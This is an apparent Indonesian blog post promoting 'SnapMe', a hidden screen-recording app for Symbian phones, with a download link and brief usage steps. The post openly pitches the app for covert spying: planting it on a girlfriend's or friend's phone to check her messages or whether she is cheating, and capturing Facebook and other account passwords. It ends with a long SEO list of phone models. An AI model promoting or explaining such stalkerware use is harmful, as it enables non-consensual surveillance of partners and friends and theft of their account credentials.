snapme apalikasi perekam semua aktivitas untuk hp symbian



Di siang ini akan aku bagikan aplikasi unik dan keren untuk semua hp symbian s60v3 ,
namanya aplikasinya adalah ''snapMe''

Ini sebenarnya bukan aplikasi baru seh, soalnya aplikasi ini sudah banyak yang share, jadi saya cuma share ulang, siapa tahu saja masih banyak yang belum tahu, soalnya aplikasi ini belum begitu terkenal, atau bagi yang sudah tahu namun aplikasinya sudah kehapus, misalnya sudah di remove atau delete sendiri, atau bahkan keformat, nah anda dapat mendownload lagi aplikasinya di sini.

Fungsi atau kegunaan dari aplikasi SnapMe ini adalah bisa untuk merekam semua aktifitas hp anda, tanpa kecolongan sedikitpun. Atau dalam istilah lain kamera tersembunyi atau kamera pengintai,
Tetapi bukan kamera tersembunyi atau camera pengintai layaknya yang sudah anda ketahui di sekitar kita, misalnya seperti CCTV itu bukan.
Sebab aplikasi SnapMe ini hanya dapat merekam seluruh aktifitas di hp anda, cocok banget jika anda curiga dengan teman atau cewek anda sms'a sapa siapa saja atau selingkuh atau tidak, anda dapat mengetahuinya dengan meminjamkan / menaruh aplikasi SnapMe di hp cwe atau hp anda sendiri. bisa juga digunakan untuk mengetahui pasword facebook atau account lain, wah, ini khusus bagi orang yang iseng iseng saja yah, semoga anda menggunakan aplikasi ini untuk kebenaran :D.



Sudah tahu kan fungsi kegunaan dan fitur fitur dari aplikasi ini?,
Jika sudah anda dapat mendownload aplikasinya di bawah ini;

>>free Download aplikasi snapme s60v3 s60v5.sis


Adapun cara menggunakanya yaitu dengan mengeklik ''enable snapshot''
Kemudian klik hide, lalu pinjamkan hp anda ke teman anda, hehe.



Jika sudah, untuk melihatnya anda klik ''disable snapshot'' Kemudian klik lagi view snapshot,



Dan silahkan anda lihatnya, hp itu di gunakan untuk apa saja terekam semuanya ...




Kata kunci;
Aplikasi video recorder s60v3 th s60v2 th s60v5 th, aplikasi gratis download perekam cctv untuk merekam semua aktiftas hp, cara mengetahui mengintai mengintip pasword fb facebook teman cewek anda, bagaimana gimana cara mengerjain teman menjaili mwb mywapblog, Aplikasi terbaik terbaru keren populer 2013 untuk hp handphone ponsel symbian bukan untuk hp handphone java. Ataupun cina, Samsung SGH-G810 SGH-i450 SGH-i520 SGH-i550 SGH-i550w SGH-i560 S60 3rd Edition, 3.2.9.3 Feature Pack 2 5320 XpressMusic 5630 XpressMusic 6210 Navigator 6220 Classic 6650 fold N78 N79 N85 N96, Samsung GT-i8510 (INNOV8) I7110, SGH-L870 S60 5th Edition 5.0.9.4 5800 XpressMusic N97, nokia 3250 5500 Sport E50 E60 E61 E61i E62 E65 E70 N71 N73 N75 N77 N80 N91 N91 8GB N92 N93 N93i LG KS10 KT610 KT615 5700 XpressMusic 6110 Navigator 6120 Classic 6121 Classic 6124 Classic 6290 E51 E63 E66 E71 E90 Communicator N76 N81, N81 8GB N82 N95 8GB, 7650 3650 3660 N-Gage QD 3600 3620 SX1 D700 Sendo X 6600 Sendo X2, 7610 6670 3230 6260 6620 X700 X800 D720 D730 anna belle N97 5800 XpressMusic 5230 5228 5530 C6-00 N97 mini X6 C5-03 i8910 Omnia HD SE U5i SE U8 Vivaz pro SE U1 Satio S^3 C6-01 C7 E7 N8


Responses

0 Respones to "snapme apalikasi perekam semua aktivitas untuk hp symbian"

Categories

Recent Comments

Popular Posts

Labels

Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by Hack Tutors